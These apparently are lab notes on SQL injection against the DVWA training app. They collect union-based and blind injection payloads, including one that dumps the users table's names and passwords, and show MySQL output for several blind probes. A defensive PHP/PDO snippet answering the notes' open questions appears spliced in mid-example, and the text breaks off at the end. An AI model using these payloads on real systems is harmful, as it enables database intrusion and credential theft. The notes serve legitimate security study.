SQL injection basics, based on DVWA
SQL injection
Open questions
- Look into how to write ORDER BY safely with PDO
- How to tell numeric injection from string injection
Payload collection
Reference:
https://blog.csdn.net/alex_seo/article/details/89240675
With output (union-based)
- Determine the number of columns: order by 1 ; union select 1,2
- Get the current database: union select database()
- Get the tables of the current database: union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()
- Get the columns of a table: union select 1,group_concat(column_name) from information_schema.columns where table_name='users'
The single quote ' is used here; if it is filtered, the string can be written in hex instead:
union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273
- Dump the data: union select group_concat(user_id,first_name,last_name),group_concat(password) from users
Without output (blind)
- Determine the length of the database name: and length(database())=4 (tests whether the length is 4)
- Determine the database name: and ascii(substr(database(),1,1))>97 (tests whether the ASCII code of the first character of the database name is > 97)
Keep narrowing it down:
1' and ascii(substr(database(),1,1))>100 # error
1' and ascii(substr(database(),1,1))<100 # error, so the ASCII code is 100, the letter is d
In the end the database name is confirmed to be dvwa
- Determine the number of tables in the database
and (select count(table_name) from information_schema.tables where table_schema=database())=1
Tests whether the number of tables is 1
Example of what the SQL itself returns:
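Both open questions have one defensive answer: bind the user-supplied value as a typed parameter, and since ORDER BY identifiers cannot be bound, pick them from a whitelist. The following PHP/PDO snippet is an added example, not DVWA's own code; it assumes a DVWA-like `users` table and placeholder connection credentials.

```php
<?php
// Added example (not DVWA's code). Assumes a MySQL database with a users table
// like DVWA's (user_id, first_name, last_name) and placeholder credentials.
declare(strict_types=1);

$pdo = new PDO('mysql:host=127.0.0.1;dbname=dvwa;charset=utf8mb4', 'dvwa_user', 'CHANGE_ME', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false, // use real server-side prepared statements
]);

// ORDER BY cannot take a bound placeholder (placeholders stand in for values,
// not identifiers), so the sort column and direction come from fixed maps.
const ORDER_COLUMNS = ['id' => 'user_id', 'first' => 'first_name', 'last' => 'last_name'];
const ORDER_DIRS    = ['asc' => 'ASC', 'desc' => 'DESC'];

function fetchUsers(PDO $pdo, string $rawId, string $rawSort, string $rawDir): array
{
    // Numeric parameter: validate the shape first, then bind it as an integer.
    // Input such as "1' and length(database())=4" never reaches the SQL text.
    if (!ctype_digit($rawId)) {
        throw new InvalidArgumentException('id must be a non-negative integer');
    }
    // Unknown sort keys fall back to a default instead of being interpolated.
    $column = ORDER_COLUMNS[strtolower($rawSort)] ?? 'user_id';
    $dir    = ORDER_DIRS[strtolower($rawDir)] ?? 'ASC';

    $sql  = "SELECT user_id, first_name, last_name FROM users WHERE user_id = :id ORDER BY {$column} {$dir}";
    $stmt = $pdo->prepare($sql);
    $stmt->bindValue(':id', (int) $rawId, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Usage: the value is bound, the identifiers are whitelisted.
var_dump(fetchUsers($pdo, '1', 'first', 'desc'));
```

For a string-typed column the same pattern applies with PDO::PARAM_STR; the distinction between numeric and string injection only matters when the value is concatenated into the query text.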
MySQL [dvwa]> select count(table_name) from information_schema.tables where table_schema="dvwa";
+-------------------+
| count(table_name) |
+-------------------+
| 2 |
+-------------------+
- Determine the length of a table name
length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=1
Increase the length value step by step; whether the page returns normally tells you the length of the table name.
Example:
MySQL [dvwa]> select length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1));
+--------------------------------------------------------------------------------------------------------------+
| length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1)) |
+--------------------------------------------------------------------------------------------------------------+
| 9 |
+--------------------------------------------------------------------------------------------------------------+
- Guess the table name
ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>97
Tests whether the first character of the first table name in the current database is > 97; the table name can be guessed one character at a time this way.
Example:
MySQL [dvwa]> select ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1));
+---------------------------------------------------------------------------------------------------------------+
| ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)) |
+---------------------------------------------------------------------------------------------------------------+
| 103 |
+---------------------------------------------------------------------------------------------------------------+
- Determine the number of columns in a table
and (select count(column_name) from information_schema.columns where table_name='users')=1
- Guess the column length
and length(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1))=1
Tests whether the first column of the users table has length 1; keep going until the length is found.
Example:
MySQL